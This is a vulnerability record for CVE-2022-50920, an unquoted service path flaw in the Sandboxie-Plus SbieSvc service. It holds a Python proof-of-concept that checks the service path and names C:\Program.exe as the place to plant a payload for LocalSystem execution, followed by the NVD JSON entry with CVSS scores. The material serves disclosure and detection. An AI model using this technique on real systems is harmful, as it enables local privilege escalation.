CVE-2022-50920

#!/usr/bin/env python3 # CVE-2022-50920 PoC - Sandboxie-Plus SbieSvc Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability # Run with administrator privileges import os import subprocess import sys def check_vulnerability(): """Check if the system is vulnerable to CVE-2022-50920""" try: # Query the SbieSvc service configuration result = subprocess.run( ['sc', 'qc', 'SbieSvc'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print('[+] SbieSvc service found') for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f'[+] Current path: {path}') # Check if path is unquoted and contains spaces if ' ' in path and not (path.startswith('"') and path.endswith('"')): print('[!] VULNERABLE: Path is unquoted and contains spaces') return True else: print('[-] NOT VULNERABLE: Path is properly quoted') return False else: print('[-] SbieSvc service not found') return False except Exception as e: print(f'[-] Error: {e}') return False def create_payload(): """Create a malicious executable to be placed at unquoted path location""" payload_path = r'C:\Program.exe' # This is a placeholder - actual payload would be malicious code # For demonstration purposes only print(f'[!] Would create malicious executable at: {payload_path}') print('[!] When SbieSvc starts, it would execute this payload with LocalSystem privileges') return payload_path if __name__ == '__main__': print('CVE-2022-50920 - Sandboxie-Plus SbieSvc Unquoted Service Path PoC') print('=' * 60) check_vulnerability() create_payload()

{"cve": {"id": "CVE-2022-50920", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie-Plus 5.50.2 contains an unquoted service path vulnerability in the SbieSvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup."}, {"lang": "es", "value": "Sandboxie-Plus 5.50.2 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio de Windows SbieSvc que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se ejecutarán con privilegios de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://sandboxie-plus.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50819", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sandboxie-plus-service-sbiesvc-unquoted-service-path", "source": "[email protected]"}]}}